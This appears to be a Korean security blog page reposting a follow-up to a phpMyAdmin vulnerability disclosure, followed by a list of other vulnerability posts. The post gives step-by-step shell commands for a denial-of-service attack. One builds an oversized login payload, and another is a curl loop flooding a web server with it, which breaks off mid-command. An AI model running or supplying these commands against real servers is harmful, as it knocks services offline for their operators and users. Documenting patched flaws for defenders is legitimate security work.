728x90
Assuming that time enough has happened since the security update was released by phpMyAdmin, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.
You can read the vulnerability details in the previous blog post. In this one, we show you the way to exploit it.
1 - Create the payload.
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload
2 - Performing the Denial of Service attack.
$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-
728x90
'취약점 정보1' 카테고리의 다른 글
| MS14-068 (0) | 2014.12.13 |
|---|---|
| MS14-068 (0) | 2014.12.13 |
| WordpreXSS Exploitation (0) | 2014.12.11 |
| Analysis of the CVE-2013-6435 Flaw in RPM (0) | 2014.12.11 |
| CVE-2014-8500: A Defect in Delegation Handling Can Be Exploited to Crash BIND (0) | 2014.12.11 |